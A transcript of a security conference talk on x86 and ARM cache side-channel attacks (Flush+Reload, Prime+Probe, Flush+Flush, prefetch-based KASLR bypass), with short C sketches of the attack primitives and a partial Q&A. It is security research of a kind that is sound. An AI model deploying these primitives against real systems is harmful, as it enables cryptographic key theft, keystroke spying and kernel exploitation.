Music

Herald Angel: We are here with a motto, and the motto of this year is "Works For Me". How many people in here are programmers? Raise your hands or shout or... Whoa, that's a lot. Okay. So I think many of you work on x86, and I think you assume that it works, and that everything works as intended. And I mean: what could go wrong? Our next talk, the first one today, will be by Clémentine Maurice, who previously was here with Rowhammer.js, something I would call scary, and Moritz Lipp, who has worked on the ARMageddon exploit. So now I would like to hear a really warm applause for the speakers and their talk "What could possibly go wrong with <insert x86 instruction here>?" Thank you.

Applause
Clémentine Maurice (CM): Well, thank you all for being here this morning. Yes, this is our talk, "What could possibly go wrong with <insert x86 instruction here>?". Just a few words about ourselves: I'm Clémentine Maurice, I got my PhD in computer science last year, and I'm now working as a postdoc at Graz University of Technology in Austria. You can reach me on Twitter or by email, but there's also, I think, a lot of time before the Congress is over.

Moritz Lipp (ML): Hi, my name is Moritz Lipp, I'm a PhD student at Graz University of Technology, and you can also reach me on Twitter, or just after our talk and in the next days.
CM: So, about this talk: the title says this is a talk about x86 instructions, but this is not a talk about software. Don't leave yet! I'm actually even assuming safe software, and the point that we want to make is that safe software does not mean safe execution: we have information leakage because of the underlying hardware, and this is what we're going to talk about today. We'll be talking about cache attacks, what they are and what we can do with them, and also a special kind of cache attack that we found this year: doing cache attacks without memory accesses, and how to use that even to bypass kernel ASLR.
So again, the title says this is a talk about x86 instructions, but it's even more global than that: we can also mount these cache attacks on ARM, not only on x86, so some of the examples that you will see also apply to ARM. Today we'll have a bit of background, but most of the background will come along the way, because this covers a really huge chunk of our research. We'll see mainly three instructions: "mov", and how we can perform these cache attacks and what they are; "clflush", where we'll be doing cache attacks without any memory accesses; then "prefetch", and how we can bypass kernel ASLR and lots of translation levels. And then there's even a bonus track, which will not be our work, but even more instructions and even more attacks.
Okay, so let's start with a bit of an introduction. We will be mainly focusing on Intel CPUs, and this is roughly how it looks today in terms of cores and caches. We have different cores, here four cores, and different levels of caches, usually three levels. We have level 1 and level 2, which are private to each core, meaning that core 0 can only access its own level 1 and level 2, and not the level 1 and level 2 of, for example, core 3. And we have the last-level cache, which is divided into slices: we have as many slices as cores, so here four slices, but all the slices are shared across cores, so core 0 can access the whole last-level cache, slices 0, 1, 2, and 3. We also have a nice property on Intel CPUs: this last level of cache is inclusive, which means that everything that is contained in level 1 and level 2 will also be contained in the last-level cache, and this will prove to be quite useful for cache attacks.
Today we mostly have set-associative caches. This means that data is loaded into a specific cache set, which depends only on its address: some bits of the address give us the index that says "okay, the line is going to be loaded in this cache set". Then we have several ways per set, here four ways, and the cache line is going to be loaded into a specific way, which depends only on the replacement policy and not on the address itself. When you load a line into the cache, the cache is usually already full, so you have to make room for the new line, and this is what the replacement policy does: it says "okay, I'm going to remove this line to make room for the next line".

Today we're going to see only three instructions, as I've been telling you. The mov instruction does a lot of things, but the only aspect we're interested in is that it can access data in main memory. We're going to see clflush: what it does is remove a cache line from the cache, from the whole cache. And we're going to see prefetch, which prefetches a cache line for future use. We'll see what they do, the kind of side effects they have, and all the attacks that we can do with them. And that's basically all you need for today, so even if you're not an expert in x86, don't worry, it's not just slides full of assembly. Okay, so on to the first one.
ML: So we will start with the mov instruction, and actually the first slide is full of code. As you can see, the mov instruction is used to move data from register to register, and from and to main memory; there are many movs you can use, but basically it just moves data, and that's all we need to know. In addition, a lot of exceptions can occur, so we might assume that the restrictions are so tight that nothing can go wrong when you just move data, because moving data is simple.
However, while there are a lot of exceptions, the data that is accessed is always loaded into the cache, transparently to the program that is running. So there are side effects when you run this instruction, and we will see what they look like with the mov instruction. You probably all know that data can be in CPU registers, in the different levels of the cache that Clémentine showed you earlier, in main memory, or on disk, and depending on where the data is located, it takes a longer or shorter time to be loaded back to the CPU. This is what we can see in this plot. We measured the access time of an address over and over again, assuming that when we access it often, it is already stored in the cache. Most of the time it takes around 70 cycles, so when we load an address and it takes 70 cycles, we can assume it is served from the cache. However, when the data is loaded from main memory, we can clearly see that it needs a much longer time, a bit more than 200 cycles. So by measuring the time it takes to load an address, we can tell whether the data was in the cache or still located in main memory. And this property is what we can exploit using cache attacks: we measure the timing differences on memory accesses.
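A minimal sketch of such a measurement in C, assuming x86 with the __rdtscp intrinsic (the exact hit/miss boundary is machine-specific and must be calibrated, like the ~70 vs. ~200 cycles in the plot):

    #include <stdint.h>
    #include <x86intrin.h>   /* __rdtscp */

    /* Time one access to *addr in CPU cycles. A real attack adds fences
     * and repeats the measurement; this is just the bare idea. */
    static inline uint64_t time_access(volatile uint8_t *addr)
    {
        unsigned int aux;
        uint64_t start = __rdtscp(&aux);
        (void)*addr;                      /* the mov we are timing */
        uint64_t end = __rdtscp(&aux);
        return end - start;               /* low => cache hit, high => DRAM */
    }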
The attacker monitors cache lines, but he has no way to know what the content of a cache line actually is: we can only see that a cache line has been accessed, not what is stored in it. What you can do with this is implement covert channels, allowing two processes to communicate with each other while evading the permission system, which we will see later on. You can also do side-channel attacks, where a malicious application spies on benign processes, and you can use this to steal cryptographic keys or to spy on keystrokes.
We have different types of cache attacks, and I want to start with the most popular one, the "Flush+Reload" attack. On the left you have the address space of the victim, and on the right the address space of the attacker, who maps a shared library (an executable that the victim is using) into his own address space, the red rectangle. This means that when this data is stored in the cache, it is cached for both processes. Now the attacker can use the flush instruction to remove the data from the cache, so it's not cached for the victim either. Then the attacker lets the victim run, and if the victim decides "yeah, I need this data", it will be loaded back into the cache. Now the attacker reloads the data, measures how long it takes, and can decide: "okay, the victim has accessed the data in the meantime" or "the victim has not accessed the data in the meantime". By doing that, you can spy on whether this address has been used.
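One round of this, sketched in C on top of the time_access() helper above (the threshold and the wait are assumptions to be calibrated):

    #include <emmintrin.h>   /* _mm_clflush */
    #include <unistd.h>      /* usleep */

    #define THRESHOLD 150    /* cycles, hit/miss boundary: an assumption */

    /* One Flush+Reload round on an address shared with the victim:
     * returns 1 if the victim accessed it since the flush. */
    int probe_flush_reload(volatile uint8_t *shared)
    {
        _mm_clflush((void *)shared);        /* Flush the shared line       */
        usleep(500);                        /* let the victim run (sketch) */
        uint64_t t = time_access(shared);   /* Reload and time it          */
        return t < THRESHOLD;               /* fast => victim accessed it  */
    }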
The second type of attack is called "Prime+Probe", and it does not rely on shared memory like the Flush+Reload attack. It works as follows: instead of mapping anything into his own address space, the attacker loads a lot of data into one cache set and fills it. Then he again lets the victim run, and the victim may access data that maps to the same cache set, so the cache set is used by the attacker and the victim at the same time. Now the attacker measures the access time to the addresses he loaded into the cache before: when he accesses an address that is still in the cache, it is fast, so he measures a low time, and if it's not in the cache anymore, it has to be reloaded, so it takes longer. He can sum this up and detect whether the victim has loaded data into the cache as well.
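The probe step as a C sketch, again using time_access() (building the eviction set, one address per way of the targeted cache set, is the hard part and is simply assumed here):

    /* Probe an eviction set that fills one cache set and sum the
     * latencies; a high sum means the victim evicted our lines. */
    uint64_t probe_set(volatile uint8_t **evset, int ways)
    {
        uint64_t total = 0;
        for (int i = 0; i < ways; i++)
            total += time_access(evset[i]);
        return total;   /* probing also re-primes the set for the next round */
    }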
The first thing we want to show you is that with cache attacks you can implement a covert channel, and this could happen in the following scenario.
You install an app on your phone to view your favorite images and to apply some filters, and you don't know that it's malicious, because the only permission it requires is access to your images, which makes sense, so you can easily install it without any fear. In addition, you want to know what the weather is outside, so you install a nice little weather widget, and the only permission it has is internet access, because it has to load the information from somewhere. Now, what happens if you're able to implement a covert channel between these two applications? Without any permissions or privileges, they can communicate with each other without using any mechanisms provided by the operating system, so it's hidden. It can happen that the gallery app sends your image to the internet, where it gets uploaded and exposed for everyone. So maybe you don't want to see the cat picture everywhere.
While we can do this with both Prime+Probe and Flush+Reload attacks, we will discuss a covert channel using Prime+Probe. So how can we transmit data? We need to transmit ones and zeros at some point. The sender and the receiver agree on one cache set that they both use, and the receiver probes this set all the time. When the sender wants to transmit a zero, he just does nothing: the lines of the receiver stay in the cache, so the receiver knows "okay, he's sending nothing", and that's a zero. On the other hand, if the sender wants to transmit a one, he starts accessing addresses that map to the same cache set, so it takes the receiver longer to access its addresses again, and he knows "okay, the sender just sent me a one". And Clémentine will show you what you can do with this covert channel.
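Sketched in C on top of time_access() and probe_set() (the slot length and threshold are assumptions to be calibrated on the target machine):

    /* Send one bit per time slot over the agreed cache set. */
    void send_bit(int bit, volatile uint8_t **evset, int ways,
                  uint64_t slot_cycles)
    {
        uint64_t start = __rdtsc();
        while (__rdtsc() - start < slot_cycles) {
            if (bit)                          /* 1: evict the receiver's lines */
                for (int i = 0; i < ways; i++)
                    (void)*evset[i];
            /* 0: stay idle, the receiver keeps getting cache hits */
        }
    }

    /* Receive one bit: a slow probe means the sender touched the set. */
    int receive_bit(volatile uint8_t **evset, int ways, uint64_t thresh)
    {
        return probe_set(evset, ways) > thresh;
    }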
CM: The really nice thing about Prime+Probe is that it has really low requirements: it doesn't need any kind of shared memory. For example, if you have two virtual machines, you could have shared memory via memory deduplication, but this is highly insecure, so cloud providers like Amazon EC2 disable it. We can still use Prime+Probe, because it doesn't need this shared memory. Another problem with cache covert channels is that they are quite noisy. When other applications are running on the system, they all compete for the cache and might evict some cache lines, especially applications that are very memory-intensive. You also have noise due to the fact that the sender and the receiver might not be scheduled at the same time: if the sender sends everything while the receiver is not scheduled, part of the transmission gets lost. So what we did is build an error-free covert channel. We took care of all these noise issues by using error detection to resynchronize the sender and the receiver, and then error correction to correct the remaining errors.
We managed to have a completely error-free covert channel even under a lot of noise (let's say another virtual machine on the same machine serving files through a web server and doing lots of memory-intensive tasks at the same time), and the covert channel stayed completely error-free at around 40 to 75 kilobytes per second, which is still quite a lot. All of this is between virtual machines on Amazon EC2. And the really neat thing, because we wanted to do something with that, is that we managed to create an SSH connection really over the cache: the two machines don't have any network between them, we are just sending zeros and ones, and we have an SSH connection between them. So you could say that cache covert channels are nothing, but I think it's a real threat. If you want more details about this work in particular, it will be published soon at NDSS.
The second application we want to show you is that we can attack crypto with cache attacks. In particular, we're going to show an attack on AES, on a special implementation of AES that uses T-tables. It's the fast software implementation, because it uses precomputed lookup tables. It has been known to be vulnerable to side-channel attacks since 2006, by Osvik et al., and it's a one-round known-plaintext attack: you have p, your plaintext, and k, your secret key, and the AES algorithm computes an intermediate state at each round r. In the first round, the accessed table indices are just p XOR k. Now, it's a known-plaintext attack, which means that if you can recover the accessed table indices, you have also recovered the key, because it's just XOR. So it would be bad, right, if we could recover these accessed table indices? Well, we can, with cache attacks! We did that with Flush+Reload and with Prime+Probe.
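The arithmetic behind this first-round property, as a small C illustration (one 64-byte cache line holds 16 four-byte T-table entries, which is why the attack sees only the upper four bits of each index):

    /* First round of AES T-table lookups: accessed index x = p ^ k, so
     * observing x for a known plaintext byte p directly yields the key
     * byte. With cache-line granularity, only the upper 4 bits of x
     * (and hence of k) are visible per measurement. */
    uint8_t recover_key_byte(uint8_t observed_index, uint8_t p)
    {
        return observed_index ^ p;   /* k = x ^ p */
    }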
On the x-axis you have the plaintext byte values, and on the y-axis you have the addresses, which are essentially the T-table entries. A black cell means that we monitored the cache line and saw a lot of cache hits: basically, the blacker it is, the more certain we are that this T-table entry has been accessed. Here it's a toy example where the key is all zeros, but you would just get a different pattern if the key was not all zeros, and as long as you can see this nice diagonal, or a pattern, you have recovered the key. So it's an old attack, 2006, it's been 10 years, everything should be fixed by now, and you see where I'm going: it's not. On Android, the Bouncy Castle implementation uses the T-table implementation by default, so that's bad. Also, many implementations that you can find online use precomputed values, so be wary of this kind of attack. The last application we want to show you is how we can spy on keystrokes.
For that we will use Flush+Reload, because it's a really fine-grained attack: we can see very precisely which cache line has been accessed, and a cache line is only 64 bytes, which is really not a lot. We're going to use that to spy on keystrokes, and we even have a small demo for you.
ML: What you can see on the screen is not Intel x86, it's a smartphone, a Galaxy S6, but you can also apply these cache attacks there, and that's what we want to emphasize. On the left you see the screen, and on the right we have connected a shell with no privileges and no permissions, so it could basically be an app that you install from the app store.

glass bottle falling

On the right we are going to start our spy tool, and on the left we just open the messenger app. Whenever the user hits any key on the keyboard, our spy tool notices that. If he presses the spacebar, we can also measure that. If the user decides "okay, I want to delete the word" because he changed his mind, we can also register that the user pressed the backspace button. So in the end we can see exactly how long the words were that the user typed into his phone, without any permissions or privileges, which is bad.

laughs

Applause
ML: So, enough about the mov instruction, let's head to clflush.
CM: The clflush instruction invalidates, from every level of the cache, the cache line that contains the address you pass to it. In itself that's kind of bad, because it enables the Flush+Reload attack that we showed earlier: that was just flush, reload, and the flush part is done with clflush. But there's actually more to it, how wonderful. There's a first timing leakage: the clflush instruction has a different timing depending on whether the data you pass to it is cached or not. Imagine you have a cache line in level 1. By the inclusion property, it also has to be in the last-level cache. This is quite convenient, and it's also why we have this inclusion property on Intel CPUs, for performance reasons: if you want to know whether a line is present at all in the cache, you only have to look in the last-level cache. This is basically what the clflush instruction does: it goes to the last-level cache, sees "okay, there's the line, I'm going to flush it", and then something indicates that the line is also present somewhere else, so it flushes the line in level 1 and/or level 2 as well. That's slow. Now, if you perform clflush on data that is not cached, it does much the same: it goes to the last-level cache, sees that there's no line, and since the data can't be anywhere else in the cache (it would be in the last-level cache if it were anywhere), it does nothing and stops there. That's fast.
So how fast and slow exactly am I talking about? It's actually only a very few cycles. We ran this experiment on different microarchitectures: Sandy Bridge, Ivy Bridge, and Haswell, and the different colors correspond to the different microarchitectures. The first thing that is already kind of funny is that you can distinguish the microarchitectures quite nicely with this, but the real point is that you have really different zones. The solid line is when we measured clflush on a line that was already in the cache, and the dashed line is when the line was not in the cache, and on all microarchitectures you can see a difference. It's only a few cycles, it's a bit noisy, so what could go wrong?
Exploiting these few cycles, we still managed to build a new cache attack that we call "Flush+Flush", and I'm going to explain it to you. Basically, everything that we could do with Flush+Reload, we can also do with Flush+Flush: we can build covert channels and side-channel attacks. It's stealthier than previous cache attacks (I'll come back to this), and it's also faster than previous cache attacks. So how does it work exactly? The principle is a bit similar to Flush+Reload: the attacker and the victim have some kind of shared memory, let's say a shared library, and it is shared in the cache. The attacker starts by flushing the cache line, then lets the victim perform whatever it does, let's say an encryption, and the victim loads some data into the cache automatically. Now the attacker wants to know again whether the victim accessed this precise cache line, and instead of reloading it, he flushes it again. Since we have this timing difference depending on whether the data is in the cache or not, it gives us the same information as reloading would, except it's way faster.
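The probe step of Flush+Flush as a C sketch, timing the flush itself (the threshold is again machine-specific, per the plots above):

    /* Time clflush itself: a slow flush means the line was cached,
     * i.e. the victim accessed it since the previous round. */
    int probe_flush_flush(volatile uint8_t *shared, uint64_t flush_thresh)
    {
        unsigned int aux;
        uint64_t start = __rdtscp(&aux);
        _mm_clflush((void *)shared);        /* the flush doubles as probe */
        uint64_t end = __rdtscp(&aux);
        return (end - start) > flush_thresh;
    }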
I talked about stealthiness, so here's the thing: these cache attacks (and this also applies to Rowhammer) are already stealthy in themselves, because no antivirus today can detect them. But some people thought that we could detect them with performance counters, because they cause a lot of cache misses and cache references, which happen when data is flushed and when you re-access memory. Now, what we thought is: yes, but other programs also cause lots of cache misses and cache references, so we would like a better metric. These cache attacks have very heavy activity on the cache, but they are also very particular, because they are very short loops of code: if you take Flush+Reload, it just flushes one line, reloads the line, and then flushes and reloads again. That very short loop creates very low pressure on the instruction TLB, which is quite particular to cache attacks. So what we decided to do is normalize the cache events, the cache misses and cache references, by events that have to do with the instruction TLB, and with that we managed to detect cache attacks and Rowhammer without false positives. This is the metric that I'm going to use when I talk about stealthiness.
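As a sketch, assuming the raw counter values have already been read from the performance-monitoring unit (the names here are illustrative, not a specific API):

    /* Cache activity normalized by instruction-TLB events: cache attacks
     * run tiny code loops with huge cache activity, so this ratio ends up
     * far above that of benign programs; detection is a fixed threshold. */
    double stealth_metric(uint64_t cache_events, uint64_t itlb_events)
    {
        return (double)cache_events / (double)(itlb_events ? itlb_events : 1);
    }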
We started by creating a covert channel, and first we wanted to have it as fast as possible, so we created a protocol to evaluate all the kinds of cache attacks that we had: Flush+Flush, Flush+Reload, and Prime+Probe, starting with a packet size of 28, which doesn't really matter. We measured the capacity of our covert channel: Flush+Flush is around 500 kB/s, whereas Flush+Reload was only 300 kB/s, so Flush+Flush is already quite an improvement in speed. Then we measured the stealthiness: at this speed, only Flush+Flush was stealthy. Now, Flush+Flush and Flush+Reload, as you've seen, have some similarities, so as covert channels they also share the same sender, only the receivers differ, and the sender was not stealthy for either of them. Anyway, if you want a fast covert channel, just try Flush+Flush, that works.
Now let's try to make it completely stealthy, because if the sender is not stealthy, it may give away the whole attack. So we said: okay, maybe if we just slow down all the attacks, there will be fewer cache hits and cache misses, and then maybe all the attacks become stealthy, why not? We tried that, we slowed down everything, so Flush+Reload and Flush+Flush are around 50 kB/s now; Prime+Probe is a bit slower, because it takes more time to prime and probe anything. But even with this slowdown, only Flush+Flush has its receiver stealthy, and now we also managed to have the sender stealthy. So basically, whether you want a fast covert channel or a stealthy covert channel, Flush+Flush is really great.
Then we wanted to evaluate whether it was too noisy to perform side-channel attacks, so we ran the side channel on the AES T-table implementation, the attack that we showed you earlier. We counted the number of encryptions that we needed to determine the upper four bits of a key byte; here, the lower the better for the attack. Flush+Reload is a bit better, needing only 250 encryptions to recover these bits, but Flush+Flush comes quite close with 350, and Prime+Probe is actually the noisiest of them all, needing close to 5000 encryptions. So we have around the same performance for Flush+Flush and Flush+Reload. Now let's evaluate the stealthiness again. Here we performed 256 billion encryptions in a synchronous attack, so the spy and the victim were synchronized, and we evaluated the stealthiness of them all; again, only Flush+Flush is stealthy. And while you can always slow down a covert channel, you can't actually slow down a side channel, because in a real-life scenario you're not going to say, "Hey victim, wait for me a bit, I'm trying to do an attack here." That won't work.
There's even more to it, but I need a bit more background before continuing. I've shown you the different levels of caches, and here I'm going to focus on the last-level cache. We have our four slices, this is the last-level cache, and we have some bits of the address that correspond to the set. But more importantly, we need to know in which slice an address is going to be, and that is given by some bits of the address that are passed into a function which says in which slice the line is going to be. Now, the thing is that this hash function is undocumented by Intel; it wouldn't be fun otherwise. So we have this: as many slices as cores, and an undocumented hash function that maps a physical address to a slice. While it's actually a bit of a pain for attacks, it was not originally designed for security but for performance, because you want all the accesses to be evenly distributed across the different slices. The hash function basically takes some bits of the physical address and outputs k bits of slice: just one bit if you have a two-core machine, two bits if you have a four-core machine, and so on. Now let's go back to clflush and see what the relation is.
What we noticed is that clflush is actually faster to reach a line on the local slice. If you always flush the same line and run your program on core 0, core 1, core 2, and core 3 in turn, you will observe that on one core in particular the clflush is faster. Here the program runs on core 1, and you can see that on cores 0, 2, and 3 it's a bit slower, so we can deduce that the line belongs to slice 1. What we can do with that is map physical addresses to slices, and that's one way to reverse-engineer this undocumented addressing function. Funnily enough, that's not the only way: what I did before that was using performance counters to reverse-engineer this function, but that's a whole other story, and if you want more detail, there's also an article on that.
ML: The next instruction we want to talk about is the prefetch instruction. Prefetch is used to tell the CPU: "Okay, please load the data I will need later on into the cache, if you have some time." There are actually six different prefetch instructions, prefetcht0 to t2 and so on, which mean: "CPU, please load the data into the first-level cache", or into the last-level cache, whatever you want to use, but we'll spare you the details, because they're not so interesting in the end.
However, what's more interesting is what the Intel manual says about it. "Using the PREFETCH instruction is recommended only if data does not fit in the cache." So you can tell the CPU: "Please load the data I want to stream into the cache, so it's more performant." "Use of software prefetch should be limited to memory addresses that are managed or owned within the application context." So one might wonder what happens if the address is not managed by myself. Sounds interesting. "Prefetching to addresses that are not mapped to physical pages can experience non-deterministic performance penalty. For example specifying a NULL pointer as an address for prefetch can cause long delays." We don't want that, because our program would be slow. So let's take a look at what they mean by non-deterministic performance penalty, because we want to write good software, right? But before that, we have to look at a bit more background information to understand the attacks.
On modern operating systems, every application has its own virtual address space, so at some point the CPU needs to translate these addresses to the physical addresses actually used in the DRAM. For that we have this complex-looking data structure: we have a 48-bit virtual address, and some of its bits index into a table, the PML4 (page map level 4) table with 512 entries, so depending on those bits the CPU knows which entry it has to look at. If there is an entry there, because the address is mapped, it can proceed and look at the page directory pointer table, and so on; it works the same at each level, down to the page table, where you have 4-kilobyte pages. So in the end it's not that complicated, but it's a bit confusing, because to learn a physical address you have to look things up somewhere in main memory, at physical addresses, to translate your virtual address. And if you have to walk all those levels, it takes a long time, so we can do better than that, which is why Intel introduced additional caches, also for all of those levels. If you want to translate an address, you look at the ITLB for instructions and the data TLB for data. If it's there, you can stop; otherwise you go down all those levels, and if it's not in any cache, you have to look it up in the DRAM.
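For illustration, this is how a 48-bit virtual address splits into the four table indices just described (a sketch for 4 KB pages):

    #include <stdint.h>

    /* Index bits of a 48-bit virtual address with 4 KB pages: 512-entry
     * tables at each of the four levels, 9 bits per level + 12 offset bits. */
    void split_va(uint64_t va, unsigned idx[4], unsigned *offset)
    {
        idx[0] = (va >> 39) & 0x1ff;   /* PML4                         */
        idx[1] = (va >> 30) & 0x1ff;   /* page directory pointer table */
        idx[2] = (va >> 21) & 0x1ff;   /* page directory               */
        idx[3] = (va >> 12) & 0x1ff;   /* page table                   */
        *offset = va & 0xfff;          /* byte offset within the page  */
    }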
In addition, the address space you have is shared: on the one hand you have the user memory, and on the other hand the kernel is mapped into the same address space, for convenience and performance. If your user program wants to use some kernel functionality, like reading a file, it switches to the kernel memory with a privilege-level switch, and then the kernel can read the file, and so on. However, you have drivers in the kernel, and if you know the addresses of those drivers, you can do code-reuse attacks. As a countermeasure, address space layout randomization was introduced for the kernel as well.
This means that when your program is running, the kernel is mapped at one address, and when you reboot the machine, it's not at the same address anymore but somewhere else. So if there is a way to find out at which address the kernel is loaded, you have circumvented this countermeasure and defeated kernel address space layout randomization, which would be nice for some attacks. In addition, there's also the kernel direct-physical map. What does this mean? It's implemented on many operating systems, like OS X, Linux, the Xen hypervisor, and BSD, but not on Windows. It means that the complete physical memory is additionally mapped into the kernel memory at a fixed offset: for every page that is mapped in user space, there is something like a twin page in the kernel memory, which you can't access, because it's kernel memory. However, we will need it later, because now we go back to prefetch and see what we can do with it.
Prefetch is not a usual instruction, because it just tells the CPU: "I might need that data later on; if you have time, load it for me." If the CPU is busy with other stuff, it can ignore the request, so there is no guarantee that this instruction is really executed, but most of the time it is. One interesting property is that it generates no faults: whatever you pass to this instruction, your program won't crash. And it does not check any privileges, so I can also pass a kernel address to it, and it won't say "No, stop, you accessed an address that you are not allowed to access, I crash"; it just continues, which is nice. The second interesting property is that the operand is a virtual address, so every time you execute this instruction, the CPU has to check which physical address this virtual address corresponds to, meaning it does the lookup through all those tables we've seen earlier. And as you have probably guessed already, the execution time of the prefetch instruction varies, and we will see later on what we can do with that.
So, let's get back to the direct-physical map, because we can create an oracle for address translation: we can find out which physical address belongs to a virtual address. Nowadays you don't want the user to know that, because with this information you can craft nice Rowhammer attacks and more advanced cache attacks, so it is restricted from the user. But let's check whether we can find a way to still get it. As I told you earlier, if you have a page mapped in user space, you have the twin page in kernel space, and if it's cached, it's cached for both of them. The attack now works as follows: as the attacker, you flush your user-space page, so it's not in the cache, also not via the kernel memory. Then you call prefetch on the corresponding kernel address, which you can still do because it doesn't create any faults: you tell the CPU, "please load me this data into the cache, even if I don't normally have access to it." If we now measure the access to our user-space page again and see a cache hit, because it has been loaded into the cache by the CPU, we know exactly which kernel address this page corresponds to, since we passed that address to the instruction. And because the direct map is at a fixed offset, we can just do a simple subtraction and get the physical address. So we have a nice way to find physical addresses for virtual addresses.
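One oracle round as a C sketch, reusing time_access() and _mm_clflush() from before (the candidate direct-map address and the threshold are assumptions of the sketch):

    #include <xmmintrin.h>   /* _mm_prefetch */

    /* Returns 1 if dpm_candidate (a guessed direct-physical-map address)
     * maps to the same frame as our own user page: prefetch raises no
     * fault and checks no privileges, so kernel addresses can be probed. */
    int oracle_hit(volatile uint8_t *page, const char *dpm_candidate,
                   uint64_t threshold)
    {
        _mm_clflush((void *)page);                 /* flush our copy       */
        _mm_prefetch(dpm_candidate, _MM_HINT_T0);  /* CPU loads the twin   */
        return time_access(page) < threshold;      /* hit => same frame    */
    }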
In practice, this looks like the following plot. It's pretty simple: we just do this for every candidate address, and at some point we measure a cache hit; there's a huge difference, and exactly at that point we know which physical address corresponds to our virtual address. The second thing we can exploit is the timing of the prefetch instruction itself. As I told you, when the CPU goes down the translation levels, at some point it sees "it's here" or "it's not here", so it can abort early. With that, we can know exactly when the prefetch instruction aborted, and therefore how the pages are mapped into the address space: the timing depends on where the translation stops.
Using those two properties, we can do the following. On the one hand, we can build variants of cache attacks: instead of Flush+Reload, we can do Flush+Prefetch, for instance. We can also use prefetch to mount Rowhammer attacks on privileged addresses, because it doesn't fault when we pass those addresses, and it works as well. In addition, we can use it to recover the translation levels of a process, which you could do earlier with the pagemap file; as I told you, that is now privileged, so you don't have access to it, and by doing this you can bypass address space layout randomization. Furthermore, as I told you, you can translate virtual addresses to physical addresses, which is now also privileged via the pagemap file, and that re-enables ret2dir exploits, which were demonstrated last year. On top of that, we can also use this to locate kernel drivers, so it would be nice if we could circumvent KASLR as well, and I will show you now how this is possible.
With the first oracle, we find all the pages that are mapped, and for each of those pages we evict the translation caches, which we can do either by calling sleep, which schedules another program, or by accessing a large memory buffer. Then we perform a syscall to the driver, so code of the driver is executed and loaded into the cache, and then we measure the time prefetch takes on this address. In the end, the page with the fastest average access time is the driver page.
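The timing primitive for this loop, sketched in C (averaging over many runs per candidate page is assumed):

    /* Time a single prefetch of a candidate kernel address: translations
     * cached by the preceding syscall make the prefetch measurably faster. */
    uint64_t time_prefetch(const char *candidate)
    {
        unsigned int aux;
        uint64_t start = __rdtscp(&aux);
        _mm_prefetch(candidate, _MM_HINT_T0);
        uint64_t end = __rdtscp(&aux);
        return end - start;
    }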
We can mount this attack on Windows 10 in less than 12 seconds. So we can defeat KASLR in less than 12 seconds, which is very nice. In practice, the measurements look like the following: we have a lot of long measurements, and at some point a low one, and we know exactly that this is the driver region and the address where the driver is located, and you can mount those ret2dir attacks again. However, that's not everything, because there are more instructions on Intel.
CM: The following is not our work, but we thought it would be interesting, because it's basically more instructions, more attacks, more fun. There's the RDSEED instruction, which requests a random seed from the hardware random number generator. The thing is that there is a fixed number of precomputed random bits, and it takes time to regenerate them, and as with everything that takes time, you can create a covert channel with that. There are also FADD and FMUL, floating-point operations whose running time depends on the operands; some people managed to bypass Firefox's same-origin policy with an SVG filter timing attack based on that. There are also the JMP instructions: modern CPUs have branch prediction and branch target prediction, and this has been studied a lot; you can create covert channels, do side-channel attacks on crypto, and also bypass KASLR. And finally, there are the TSX instructions, an extension for hardware transactional memory support, which have also been used to bypass KASLR. So, in case you're not sure: KASLR is dead. You have lots of different things to read.
Okay, so on to the conclusion. As you've seen, this is really more a problem of CPU design than of the instruction set architecture itself. The thing is that all these issues are really hard to patch: they are all linked to performance optimizations, and we are not getting rid of performance optimizations. It's basically a trade-off between performance and security, and performance seems to always win. There have been some proposals against cache attacks, say, removing the clflush instruction. The thing is that all these quick fixes won't work, because we always find new ways to do the same thing without these precise instructions, and we also keep finding new instructions that leak information. So it's really quite a big topic that we have to fix. Thank you very much for your attention; if you have any questions, we'd be happy to answer them.
Applause
Herald: Okay. Thank you very much again for your talk. Now we will have a Q&A, and we have, I think, about 15 minutes, so you can start lining up behind the microphones; they are in the gangways in the middle. Except, I think, that one... oh no, it's back up, so it will work. And while we wait, I think we will take questions from our signal angel, if there are any. Okay, there aren't any, so: microphone questions. I think, you in front.
Microphone: Hi. Can you hear me?
Herald: Try again.
Microphone: Okay. Can you hear me now? Okay. Yeah, I'd like to know what exactly your stealthiness metric was. Was it that you can't distinguish it from a normal process, or...?
CM: So...
Herald: Wait a second. We still have Q&A, so could you quiet down a bit? That would be nice.
CM: So, the question was about the stealthiness metric. Basically, we use the metric with cache misses and cache references, normalized by the instruction TLB events, and we just found the threshold: pretty much every benign application was below it, and Rowhammer and cache attacks were above it. So we fixed the threshold, basically.
H: That microphone.
Microphone: Hello. Thanks for your talk, it was great. First question: did you inform Intel before doing this talk?
CM: Nope.
Microphone: Okay. Second question: what are your future plans?
CM: Sorry?
M: What are your future plans?
CM: Ah, future plans. Well, what would be interesting is this: we keep finding these more or less by accident, or manually, so having a good idea of the actual attack surface here would be a good thing, and doing that automatically would be even better.
M: Great, thanks.
H: Okay, the microphone in the back, over there. The guy in white.
M: Hi. One question: if you had, say, a daemon that randomly invalidates some cache lines, would that be a better countermeasure than disabling the caches?
ML: What was the question?
CM: Whether invalidating cache lines would be better than disabling the whole cache.
ML: If you know which cache lines have been accessed by the process, you can invalidate those cache lines before you swap those processes, but it's a trade-off with performance. You could also flush the whole cache whenever you switch processes, and then it's empty and you don't see any activity anymore, but again there's the performance trade-off.
M: Okay, maybe a second question. There are some ARM architectures that have random cache-line invalidations. Did you try those, to see if you can still see a [unintelligible] channel there?
ML: If they're truly random... probably you just have to make more and more measurements, and then you can average out the noise, and then you can do these attacks again. It's like with Prime+Probe, where you need more measurements because it's much noisier; in the end you will just need many more measurements.
CM: On ARM, it's supposed to be pretty random, at least according to the manual, but we actually found nice ways to evict exactly the cache lines that we wanted to evict, so it's not actually that pseudo-random. Even if something were truly random, it might be nice, but it's also quite complicated to implement; I mean, you probably don't want a random number generator just for the cache.
M: Okay. Thanks.
H: Okay, and then the three guys here at the microphone in the front.
M: My question is about a detail of the keylogger. You could distinguish between space, backspace, and the alphabet, which is quite interesting. But could you also figure out the specific keys that were pressed, and if so, how?
ML: Yeah, that depends on the implementation of the keyboard. What we attacked was the Android stock keyboard that ships with the Samsung, so it's pre-installed. If there is a table somewhere in the code which says "okay, if you press this exact location or this image, it's an A or it's a B", then you can also do a more sophisticated attack. So if you find functions or data in the code that directly tell you "okay, this is this character", you can also spy on the actual key characters on the keyboard.
M: Thank you.
M: Hi. Thank you for your talk. My first question is: what can we actually do now to mitigate this kind of attack? By, for example, switching off TSX or using ECC RAM?
